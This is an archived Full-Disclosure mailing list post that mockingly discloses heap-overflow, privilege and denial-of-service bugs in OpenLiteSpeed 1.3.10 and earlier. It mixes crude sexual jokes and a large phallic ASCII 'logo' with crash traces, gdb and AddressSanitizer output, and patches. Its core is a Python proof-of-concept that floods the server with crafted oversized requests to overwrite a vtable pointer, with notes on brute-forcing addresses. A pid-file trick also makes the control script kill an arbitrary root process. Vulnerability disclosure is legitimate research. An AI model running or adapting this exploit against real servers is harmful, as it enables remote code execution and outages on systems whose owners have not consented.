| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 13 May 2015 17:13:37 +0100
From: Anal Bleed <analbleedlabs@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple Vulnerabilities in Openlitespeed <= 1.3.10 -
CVE-b045-73d a.k.a. Analbleed.
This is an irresponsible disclosure of the vulnerability, which will bring
large parts of the Internet into its knees - CVE-b045-73d a.k.a Analbleed.
Obviously you can find the fancy logo for it below (officially approved by
the security community and industry worldwide). You can also listen to the
O.S.T. on the vuln's official website free of charge (as for now) here at
http://analbleed.com. If you are interested in purchasing t-shirts, cups,
stickers etc. visit our on-line shop on the same page. Special offer
includes also a vademecum treating about all logo branded vulns released so
far. You can now focus on studying their names, logos and more instead of
actually doing your own research.
Knowing life the logo formatting will break;P But not to worry my friend. Visit
the official web page to please your eyes with it.</rant>
http://en.wikipedia.org/wiki/LiteSpeed_Technologies_Inc.: May 2013 : It is
used by 2% of all websites according to W3Techs,[9] making it the 4th most
popular web servers.
Yup, whatever. Please, think of the kittens -
http://en.wikipedia.org/wiki/Every_time_you_masturbate..._God_kills_a_kitten
Ok, here comes the Analbleed pain...
+`
`+++,
.+++++:
:+++++++'
++++++++++'
+++++++++++++
+++++++++++++++
+++++++++++++++++
+++++++++++++++++++
+++++++++++++++++++++
+++++++++++++++++++++++
+++++++++++++++++++++++++`
`+++++++++++++++++++++++++++,
`+++++++++++++++++++++++++++++.
.+++++++++++++++++++++++++++++++:
:++++++++++++++++
++++++++++++++++:
;++++++++++++++++
++++++++++++++++;
'++++++++++++++++
++++++++++++++++;
+++++++++++++++++
++++++++++++++++;
+++++++++++++++++
++++++++++++++++'
+++++++++++++++++
'+++++++++++++++'
++++++++++++++++'
'+++++++++++++++'
++++++++++++++++:
:+++++++++++++++'
`++++++++++++++++,
,++++++++++++++++
`++++++++++++++++`
`++++++++++++++++
,++++++++++++++++
++++++++++++++++
,++++++++++++++++ `,,`
++++++++++++++++
,++++++++++++++++ :++++++'
++++++++++++++++
,++++++++++++++++ ++++++++++`
++++++++++++++++
:++++++++++++++++ +++++++++++'
++++++++++++++++
,++++++++++++++++ ,++++++++++++.
++++++++++++++++
,++++++++++++++++ +++++++++++++:
++++++++++++++++
,++++++++++++++++ ;+++++++++++++:
++++++++++++++++
`++++++++++++++++ ++++++++++++++.
'+++++++++++++++
`+++++++++++++++' +++++++++++++'
'+++++++++++++++
+++++++++++++++' :+++++++++++++`
'+++++++++++++++
+++++++++++++++' ++++++++++++:
'+++++++++++++++
+++++++++++++++' ++++++++++`
'+++++++++++++++
+++++++++++++++' ++++++++++
'+++++++++++++++
+++++++++++++++' ++++++++++
'+++++++++++++++
'++++++++++++++' `++++++++++
'+++++++++++++++
:+++++++++++++++ ,+++++++++;
'++++++++++++++:
`+++++++++++++++ ;+++++++++.
+++++++++++++++`
+++++++++++++++ '+++++++++`
+++++++++++++++
+++++++++++++++ '+++++++++`
+++++++++++++++
'++++++++++++++ ++++++++++
+++++++++++++++
.++++++++++++++ ++++++++++
++++++++++++++.
++++++++++++++` ++++++++++
++++++++++++++
++++++++++++++: ++++++++++
,++++++++++++++
.+++++++++++++' ++++++++++
'+++++++++++++,
++++++++++++++ ++++++++++
++++++++++++++
'+++++++++++++ ++++++++++
++++++++++++++
+++++++++++++` ++++++++++`
+++++++++++++
+++++++++++++' '+++++++++`
'+++++++++++++
+++++++++++++ '+++++++++`
+++++++++++++`
+++++++++++++ ;+++++++++.
+++++++++++++
++++++++++++' ,+++++++++,
'++++++++++++
+++++++++++++ `+++++++++;
+++++++++++++
++++++++++++, `++++++++++
,++++++++++++
`++++++++++++ ++++++++++
++++++++++++,
++++++++++++, ++++++++++
.++++++++++++
++++++++++++ ++++++++++
++++++++++++
+++++++++++' ++++++++++`
'+++++++++++
.+++++++++++ '+++++++++:
+++++++++++.
;+++++++++++ .++++++++++
+++++++++++;
++++++++++++ ++++++++++
++++++++++++
++++++++++++ ++++++++++
++++++++++++
+++++++++++; ++++++++++.
;+++++++++++
+++++++++++, '+++++++++'
,+++++++++++
+++++++++++, .++++++++++
.+++++++++++
+++++++++++. ++++++++++
.+++++++++++
+++++++++++. ++++++++++'
.+++++++++++
+++++++++++, ;++++++++++
.+++++++++++
+++++++++++; `+++++++++++
:+++++++++++
++++++++++++ ++++++++++++
++++++++++++
++++++++++++ '+++++++++++,
++++++++++++
;+++++++++++ ++++++++++++
+++++++++++;
.+++++++++++ +++++++++++++
+++++++++++.
+++++++++++' +++++++++++++++
'+++++++++++
++++++++++++ +++++++++++++++++
++++++++++++
++++++++++++: +++++++++++++++++++
,++++++++++++
`++++++++++++ +++++++++++++++++++++
++++++++++++.
+++++++++++++ .+++++++++++++++++++++++,
+++++++++++++
'++++++++++++'
'+++++++++++++++++++++++++' '+++++++++++++
++++++++++++++
+++++++++++++++++++++++++++++ '+++++++++++++
+++++++++++++++
'++++++++++++++++++++++++++++++++ +++++++++++++++
++++++++++++++++
'+++++++++++++++++++++++++++++++++++' '+++++++++++++++
'+++++++++++++++++`
`++++++++++++++++++++`++++++++++++++++++++.
`+++++++++++++++++'
++++++++++++++++++++',...,+++++++++++++++++++++++
+++++++++++++++++++++++,...,'++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++
`+++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++.
,+++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++:
,++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++,
+++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++`
++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++
,++++++++++++++++++++++++++++++++++++++
+++++++;+++++++++++++++++++++++++++++++,
;+++++++++++++++++++++++++++'++++++++ +++++++
'+++++++++++++++++++++++++++;
:+++++++++++++++++++++++: ++++++++ +++++++
:+++++++++++++++++++++++:
'+++++++++++++++++++ ++++++++ +++++++
'+++++++++++++++++'
.;+++++++++;` +++ ++++++++ +++++++
`;+++++++++'.
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
+++ ++++++++ +++++++
+++
++++++++ +++++++
+++
++++++++ +++++++
+++
++++++++ +++++++
+++
++++++++ +++++++
+++
++++++++ +++++++
+++
++++++++ +++++++
+++
++++++++ +++++++
+++
+++++++ +++++++
+++
++++++ +++++++
+++
+ +++++++
+++
+++++++
+++
+++++++
+++
+++++++
+++
+++++++
++
+++++++
+++++++
+++++++
+++++++
+++++++
++++++
++++++
++++
Bigger the better. Don't you think?
source:
=======
int Appender::append(LoggingEvent *pEvent)
{
char achBuf[9000];
char *pMessage = achBuf;
int len;
if (!pEvent)
return -1;
Layout *pLayout;
if (pEvent->m_pLayout)
pLayout = pEvent->m_pLayout;
else
pLayout = m_pLayout; ; this path is taken, m_pLayout is
on overwritten heap
if (pLayout)
len = pLayout->format(pEvent, pMessage, sizeof(achBuf)); ;
SIGSEGV here
else
{
pMessage = (char *)pEvent->m_pMessageBuf;
len = pEvent->m_iMessageLen;
}
return append(pMessage, len);
}
gdb (aftermath):
================
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x7df6f0 --> 0x4f61d0 --> 0x4b9480
(<log4cxx::FileAppender::~FileAppender()>: mov QWORD PTR
[rdi],0x4df2b0)
RCX: 0x2328 ('(#')
RDX: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE]
[127.0.0.1:34844] Http request header is too big, abandon!\n")
RSI: 0x7fffffffc390 --> 0x1388
RDI: 0x77f660 ('!' <repeats 200 times>...)
RBP: 0x7df780 --> 0x4f6110 --> 0x4b90b0 (<log4cxx::Logger::~Logger()>:
mov QWORD PTR [rdi],0x4df2b0)
RSP: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE]
[127.0.0.1:34844] Http request header is too big, abandon!\n")
RIP: 0x4b8c37 (<log4cxx::Appender::append(log4cxx::LoggingEvent*)+55>:
call QWORD PTR [r8+0x18])
R8 : 0x2121212121212121 ('!!!!!!!!')
R9 : 0x1
R10: 0x552cf656
R11: 0x0
R12: 0x1388
R13: 0x0
R14: 0x7742c0 --> 0x7e4530 --> 0x54534f5000000000 ('')
R15: 0x1
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT
direction overflow)
0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0,
pEvent=0x7fffffffc390) at appender.cpp:63
63 len = pLayout->format(pEvent, pMessage, sizeof(achBuf));
gdb-peda$ bt
#0 0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0,
pEvent=0x7fffffffc390) at appender.cpp:63
#1 0x00000000004b8fe8 in log4cxx::Logger::vlog (this=0x7df780,
level=level@...ry=0x1388,
format=format@...ry=0x4e5310 "[%s] Http request header is too big,
abandon!", args=args@...ry=0x7fffffffe418,
no_linefeed=no_linefeed@...ry=0x0)
at logger.cpp:111
#2 0x0000000000463876 in vnotice (args=0x7fffffffe418,
format=<optimized out>, this=<optimized out>) at
../../src/log4cxx/logger.h:106
#3 HttpLog::notice (pLogger=<optimized out>, fmt=fmt@...ry=0x4e5310
"[%s] Http request header is too big, abandon!") at httplog.cpp:381
#4 0x000000000047e1f4 in HttpSession::readToHeaderBuf
(this=this@...ry=0x774280) at httpsession.cpp:638
#5 0x000000000048422b in HttpSession::onReadEx (this=0x774280) at
httpsession.cpp:1645
#6 0x0000000000474205 in NtwkIOLink::handleEvents (this=0x778a10,
evt=<optimized out>) at ntwkiolink.cpp:310
#7 0x00000000004c4ccc in epoll::waitAndProcessEvents (this=0x7923f0,
iTimeoutMilliSec=<optimized out>) at epoll.cpp:190
#8 0x0000000000469de2 in EventDispatcher::run
(this=this@...ry=0x7795c8) at eventdispatcher.cpp:219
#9 0x0000000000451450 in HttpServerImpl::start (this=0x7795a0) at
httpserver.cpp:406
#10 0x0000000000457ca9 in HttpServer::start (this=<optimized out>) at
httpserver.cpp:3216
#11 0x000000000044a700 in LshttpdMain::main (this=this@...ry=0x779350,
argc=argc@...ry=0x1, argv=argv@...ry=0x7fffffffe758) at
lshttpdmain.cpp:930
#12 0x000000000044a672 in main (argc=argc@...ry=0x1,
argv=argv@...ry=0x7fffffffe758) at main.cpp:109
#13 0x00007ffff5cc9ec5 in __libc_start_main (main=0x44a640 <main(int,
char**)>, argc=0x1, argv=0x7fffffffe758, init=<optimized out>,
fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe748) at libc-start.c:287
#14 0x000000000044be52 in _start ()
gdb-peda$ disas
Dump of assembler code for function
log4cxx::Appender::append(log4cxx::LoggingEvent*):
0x00000000004b8c00 <+0>: push rbx
0x00000000004b8c01 <+1>: sub rsp,0x2330
0x00000000004b8c08 <+8>: mov rax,QWORD PTR fs:0x28
0x00000000004b8c11 <+17>: mov QWORD PTR [rsp+0x2328],rax
0x00000000004b8c19 <+25>: xor eax,eax
0x00000000004b8c1b <+27>: test rsi,rsi
0x00000000004b8c1e <+30>: je 0x4b8c82
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+130>
0x00000000004b8c20 <+32>: mov rbx,rdi
0x00000000004b8c23 <+35>: mov rdi,QWORD PTR [rsi+0x20];
0x7fffffffc390 + 0x20 = 0x7fffffffc3b0 = 0x0 ?!?!?
0x00000000004b8c27 <+39>: test rdi,rdi
0x00000000004b8c2a <+42>: je 0x4b8c70
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+112>
0x00000000004b8c2c <+44>: mov r8,QWORD PTR [rdi] ; 0x77f660
-> '!' <repeats 200 times>...
0x00000000004b8c2f <+47>: mov ecx,0x2328
0x00000000004b8c34 <+52>: mov rdx,rsp
=> 0x00000000004b8c37 <+55>: call QWORD PTR [r8+0x18] ; SIGSEGV
on $r8 + 0x18 = 0x2121212121212139
0x00000000004b8c3b <+59>: mov rcx,rsp
0x00000000004b8c3e <+62>: mov edx,eax
0x00000000004b8c40 <+64>: mov r8,QWORD PTR [rbx]
0x00000000004b8c43 <+67>: mov rsi,rcx
0x00000000004b8c46 <+70>: mov rdi,rbx
0x00000000004b8c49 <+73>: call QWORD PTR [r8+0x38]
0x00000000004b8c4d <+77>: mov rcx,QWORD PTR [rsp+0x2328]
0x00000000004b8c55 <+85>: xor rcx,QWORD PTR fs:0x28
0x00000000004b8c5e <+94>: jne 0x4b8c89
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+137>
0x00000000004b8c60 <+96>: add rsp,0x2330
0x00000000004b8c67 <+103>: pop rbx
0x00000000004b8c68 <+104>: ret
0x00000000004b8c69 <+105>: nop DWORD PTR [rax+0x0]
0x00000000004b8c70 <+112>: mov rdi,QWORD PTR [rbx+0x18]
0x00000000004b8c74 <+116>: test rdi,rdi
0x00000000004b8c77 <+119>: jne 0x4b8c2c
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+44>
0x00000000004b8c79 <+121>: mov rcx,QWORD PTR [rsi+0x10]
0x00000000004b8c7d <+125>: mov edx,DWORD PTR [rsi+0x18]
0x00000000004b8c80 <+128>: jmp 0x4b8c40
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+64>
0x00000000004b8c82 <+130>: mov eax,0xffffffff
0x00000000004b8c87 <+135>: jmp 0x4b8c4d
<log4cxx::Appender::append(log4cxx::LoggingEvent*)+77>
0x00000000004b8c89 <+137>: call 0x449720 <__stack_chk_fail@plt>
End of assembler dump.
gdb-peda$ p *(log4cxx::LoggingEvent*)$rsi
$5 = {
m_level = 0x1388,
m_flag = 0x0,
m_pLoggerName = 0x7df7d4 "Example",
m_pMessageBuf = 0x7fffffffc3d0 "[127.0.0.1:34846] Http request
header is too big, abandon!",
m_iMessageLen = 0x3a,
m_pLayout = 0x0,
m_timestamp = {
tv_sec = 0x552cf656,
tv_usec = 0xa5ec6
}
}
gdb-peda$ p *pLayout
$5 = {
<Duplicable> = {
_vptr.Duplicable = 0x2121212121212121,
m_sName = {
<AutoStr> = {
m_pStr = 0x2121212121212121 <error: Cannot access memory at
address 0x2121212121212121>
},
members of AutoStr2:
m_iStrLen = 0x21212121
}
},
members of log4cxx::Layout:
m_pUserData = 0x2121212121212121
}
ASAN:
=====
==24207==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x62700000a100 at pc 0x7ffff5c1dd4c bp 0x7fffffffe0d0 sp
0x7fffffffe0a8
WRITE of size 2796 at 0x62700000a100 thread T0
#0 0x7ffff5c1dd4b in memmove
(/usr/lib/x86_64-linux-gnu/libasan.so.1+0x34d4b)
#1 0x488dda in AutoBuf::appendNoCheck(char const*, int)
(/home/jbieber/ospeed/bin/openlitespeed+0x488dda)
#2 0x488adb in AccessLog::appendStr(char const*, int)
/home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:652
// must be <= 4096
#3 0x48892b in AccessLog::log(HttpSession*)
/home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:627
// logs referer and user-agent hdrs
#4 0x4a2de0 in HttpVHost::logAccess(HttpSession*) const
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:354
#5 0x4bb9ec in HttpSession::logAccess(int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:184
#6 0x4c012e in HttpSession::closeConnection()
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1860
#7 0x4bbce3 in HttpSession::nextRequest()
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:266
// must be non keep-alive; best use HTTP/1.0
#8 0x4bf01c in HttpSession::handlerProcess(HttpHandler const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1371
#9 0x4bea64 in HttpSession::processURI(int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1228
#10 0x4be070 in HttpSession::redirect(char const*, int, int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1011
#11 0x4bf529 in HttpSession::sendHttpError(char const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1536
#12 0x4c49c9 in HttpSession::httpError(int, char const*)
../../src/http/httpsession.h:287
#13 0x4bfa62 in HttpSession::onReadEx()
/home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1692
#14 0x4ace2a in NtwkIOLink::onRead(NtwkIOLink*)
/home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:745
#15 0x4ab7d5 in NtwkIOLink::handleEvents(short)
/home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:310
#16 0x52611c in epoll::waitAndProcessEvents(int)
/home/jbieber/openlitespeed-1.3.8/src/edio/epoll.cpp:261
#17 0x49efeb in EventDispatcher::run()
/home/jbieber/openlitespeed-1.3.8/src/http/eventdispatcher.cpp:219
#18 0x4769bc in HttpServerImpl::start()
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:406
#19 0x47e25f in HttpServer::start()
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3216
#20 0x473dff in LshttpdMain::main(int, char**)
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:930
#21 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109
#22 0x7ffff4df1ec4 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#23 0x471698 (/home/jbieber/ospeed/bin/openlitespeed+0x471698)
0x62700000a100 is located 0 bytes to the right of 12288-byte region
[0x627000007100,0x62700000a100)
allocated by thread T0 here:
#0 0x7ffff5c3da96 in __interceptor_realloc
(/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54a96)
#1 0x539e51 in AutoBuf::allocate(int)
/home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:42
#2 0x539dcd in AutoBuf::AutoBuf(int)
/home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:26
#3 0x487f46 in AccessLog::AccessLog()
/home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:446
#4 0x4a22a2 in HttpVHost::setAccessLogFile(char const*, int)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:194
#5 0x486837 in HttpLogSource::initAccessLog(XmlNode const*, long*)
/home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:117
#6 0x4865d9 in HttpLogSource::initAccessLog(XmlNode const*, int)
/home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:69
#7 0x4a7a76 in HttpVHost::config(XmlNode const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2044
#8 0x4a8781 in HttpVHost::configVHost(XmlNode const*, char const*,
char const*, char const*, char const*, XmlNode const*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2307
#9 0x4a8a52 in HttpVHost::configVHost(XmlNode*)
/home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2370
#10 0x47ca8b in HttpServerImpl::configVHosts(XmlNode const*)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2227
#11 0x47db52 in HttpServerImpl::configServer(int, XmlNode*)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2586
#12 0x47df45 in HttpServerImpl::initServer(XmlNode*, int&, int)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2775
#13 0x47e7f1 in HttpServer::initServer(XmlNode*, int&, int)
/home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3415
#14 0x473354 in LshttpdMain::config()
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:629
#15 0x473aff in LshttpdMain::init(int, char**)
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:846
#16 0x473de2 in LshttpdMain::main(int, char**)
/home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:926
#17 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109
#18 0x7ffff4df1ec4 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 memmove
poc:
====
#!/usr/bin/python
import sys
import struct
import socket
#
# openlitespeed v1.3.10:
#
# Kali:
# CANARY : ENABLED
# FORTIFY : disabled
# NX : ENABLED
# PIE : disabled
# RELRO : disabled
#
# Ubuntu:
# CANARY : ENABLED
# FORTIFY : ENABLED
# NX : ENABLED
# PIE : disabled
# RELRO : Partial
#
# 00400000-0052e000 r-xp 00000000 fc:00 323891
# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
# 0072d000-0072e000 r--p 0012d000 fc:00 323891
# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
# 0072e000-00735000 rw-p 0012e000 fc:00 323891
# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
# 00735000-007b0000 rw-p 00000000 00:00 0
# [heap]
# 007b0000-009d7000 rw-p 00000000 00:00 0
# [heap]
# 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0
# [stack]
#
# .data base: 0x00000000007e1100
# .data size: 0x001e1100
#
# for kernel.randomize_va_space=1 one can use .data segment which is
# holding the request
#
# for kernel.randomize_va_space=2 one need to brute-force in order to find
# the address holding our request
#
# final = .data_addr (brute-forced addr, e.g.: 0x8ab8c4) + 0xe32 (offset)
#
def sendnokeepalive(r):
h = 'localhost'
p = 8088
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((h, p))
s.send(r)
r = s.recv(4096)
s.close()
return s
if __name__ == '__main__':
daddr = int(sys.argv[1], 16) - 0x18 + 0xe32
r8_offset_addr = struct.pack('<Q', daddr)
print(" .data address: 0x%x") % daddr
gadget = 0x4141414141414141
final = struct.pack('<Q', gadget)
print("gadget address: 0x%x") % gadget
r1 = 'POST /w HTTP/0.9\n\rReferer: t\n\rUser-Agent: f\n\r\n\r'
r2 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'
r2 += 'Referer: ' + final + '!' * 3679 + '\n'
r2 += 'Content-Type: ' + '!' * 3740 + '\n'
r2 += 'Content-Type: ' + '!' * 3935 + '\n'
r2 += 'Content-Type: ' + '!' * 4157 + '\n'
r2 += 'Content-Type: ' + '!' * 4117 + '\n\n'
r3 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'
r3 += 'Referer: ' + 'AAAAAAAA' + '!' * 1500
r3 += r8_offset_addr + '!' * 2171 + '\n'
r3 += 'Content-Type: ' + '!' * 3740 + '\n'
r3 += 'Content-Type: ' + '!' * 3935 + '\n'
r3 += 'Content-Type: ' + '!' * 4157 + '\n'
r3 += 'Content-Type: ' + '!' * 4117 + '\n\n'
# XXX: should be 5 or 6 reqs in total, 'while'
# used for convenience during testing
while(1):
sendnokeepalive(r1)
sendnokeepalive(r2)
sendnokeepalive(r3)
sys.exit(0)
patch:
======
--- accesslog.cpp.orig 2015-04-23 23:11:31.265510318 +0200
+++ accesslog.cpp 2015-04-23 23:54:48.921496609 +0200
@@ -643,7 +643,7 @@ int AccessLog::appendStr(const char *pSt
if (*pStr)
{
m_buf.append('"');
- if ((len > 4096) || (m_buf.capacity() <= len + 2))
+ if ((len > 4096) || (m_buf.capacity() <= len + 2) ||
(m_buf.size() + len) >= LOG_BUF_SIZE)
{
flush();
m_pAppender->append(pStr, len);
bonus features:
===============
#1:
Neither /home/wrecking/ospeed/bin/lswsctrl.open nor make install check the
/tmp/lshttpd/.
-- cut --
$ id
uid=1003(wrecking) gid=1003(ball) groups=1003(ball),4(adm),27(sudo)
$ ls -lah /tmp/lshttpd/
total 15M
drwxr-xr-x 4 wrecking ball 4.0K Apr 1 16:50 .
drwxrwxrwt 12 root root 15M Apr 1 16:53 ..
drwxr-xr-x 2 wrecking ball 4.0K Mar 6 16:42 bak_core
-rw-r--r-- 1 wrecking ball 6 Apr 1 16:50 lshttpd.pid
-rw-r--r-- 1 wrecking ball 446 Apr 1 16:18 .rtreport
-rw-r--r-- 1 wrecking ball 174 Apr 1 16:17 .status
drwx------ 12 wrecking ball 4.0K Mar 16 12:25 swap
$ sudo nc -l localhost -p 6666 -v &
[1] 25222
$ Listening on [localhost] (family 0, port 6666)
$ ps axuwww | grep local
root 25222 0.0 0.0 73288 2132 pts/0 S+ 13:37 0:00 sudo nc -l
localhost -p 6666
root 25223 0.0 0.0 11224 784 pts/0 S+ 13:37 0:00 nc -l
localhost -p 6666
$ echo 25222 > /tmp/lshttpd/lshttpd.pid
$ sudo /home/wrecking/ospeed/bin/lswsctrl.open stop
[OK] litespeed: stopped.
$
[1]+ Exit 140 sudo nc -l localhost -p 6666 -v
$
-- cut --
#2:
DoS while processing unknown headers. The poc test case is now >20MB so we
will spare the fd and won't send it;] reading about delta debugging in
progress, sorry.
asan:
==3678==ERROR: AddressSanitizer: SEGV on unknown address
0x61d74683afcc (pc 0x0000004b477c sp 0x7fffd40198e0 bp 0x7fffd4019950
T0)
#0 0x4b477b in HttpReq::processHeaderLines()
/home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543
#1 0x4b3990 in HttpReq::processHeader()
/home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:224
#2 0x4bce44 in HttpSession::readToHeaderBuf()
/home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:614
#3 0x4bf996 in HttpSession::onReadEx()
/home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:1645
#4 0x4acf54 in NtwkIOLink::onRead(NtwkIOLink*)
/home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:745
#5 0x4ab8ff in NtwkIOLink::handleEvents(short)
/home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:310
#6 0x527365 in epoll::waitAndProcessEvents(int)
/home/jbieber/openlitespeed-1.3.10/src/edio/epoll.cpp:190
#7 0x49f0f7 in EventDispatcher::run()
/home/jbieber/openlitespeed-1.3.10/src/http/eventdispatcher.cpp:219
#8 0x476abc in HttpServerImpl::start()
/home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:406
#9 0x47e34b in HttpServer::start()
/home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:3216
#10 0x473eff in LshttpdMain::main(int, char**)
/home/jbieber/openlitespeed-1.3.10/src/main/lshttpdmain.cpp:930
#11 0x47191f in main /home/jbieber/openlitespeed-1.3.10/src/main.cpp:109
#12 0x7f78c3e41ec4 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#13 0x471798 (/home/jbieber/ospeed/bin/openlitespeed+0x471798)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV
/home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543
HttpReq::processHeaderLines()
==3678==ABORTING
source:
int HttpReq::processHeaderLines()
{
...
key_value_pair *pCurHeader = NULL;
...
else
{
pCurHeader = newUnknownHeader();
eCurHeader->keyOff = pLineBegin - m_headerBuf.begin();
...
2.
key_value_pair *newUnknownHeader()
{ return newKeyValueBuf(m_headerIdxOff); }
3.
key_value_pair *HttpReq::newKeyValueBuf(int &idxOff)
{
char *p = NULL;
int orgSize;
int newSize;
int used;
if (idxOff == 0) // idxOff = m_headerIdxOff = 0x3e4
{
orgSize = 0;
used = 0;
}
else
{
p = m_reqBuf.getPointer(idxOff); // m_pBuf + idxOff =
0x61d00000cc64 -> 0x74682e3500000028
orgSize = *((int *)p); // 0x28
used = *(((int *)p) + 1); // 0x74682e35
}
if (used == orgSize) // path not taken
...
}
++*(((int *)p) + 1); // wtf?!
return (key_value_pair *)(p + sizeof(int) * 2) + used;
gdb:
Breakpoint 1, HttpReq::newKeyValueBuf (this=0x619000014fa0,
idxOff=@...19000015090: 0x3e4) at httpreq.cpp:723
723 // 0xa
gdb-peda$
p = 0x61d00000cc64 "(" // p fucked up for some reason
orgSize = 0x28
newSize = 0x0
used = 0x74682e35
$164 = 0x74682e35 // *(((int *)p) + 1)
$165 = 0x28 // *((int *)p)
$166 = 0x74682e36 // ++*(((int *)p) + 1)
Program received signal SIGSEGV, Segmentation fault.
fucked up patch:
--- src/http/httpreq.cpp.orig 2015-04-24 01:52:23.641459379 +0200
+++ src/http/httpreq.cpp 2015-04-24 17:17:50.169166351 +0200
@@ -49,6 +49,8 @@
#include <stdlib.h>
#include <unistd.h>
+#include <sys/mman.h>
+
#include <new>
#include <util/ssnprintf.h>
@@ -539,6 +541,11 @@ int HttpReq::processHeaderLines()
}
else
{
+ if (mprotect(&pCurHeader, sizeof(key_value_pair),
PROT_READ|PROT_WRITE) == -1) {
+ LOG_INFO(("[%s] Status 500: failed on
mprotect()!", getLogId()));
+ return SC_500;
+ }
+
pCurHeader = newUnknownHeader();
pCurHeader->keyOff = pLineBegin - m_headerBuf.begin();
pCurHeader->keyLen = skipSpace(pMark, pLineBegin) - pLineBegin;
#3:
In case you would wonder. Yes, thare are more bugs sitting out there. For
example one that was found independently
http://www.security-assessment.com/files/documents/advisory/Open%20Litespeed%20Use%20After%20Free%20Vulnerability.pdf
ThE EnD
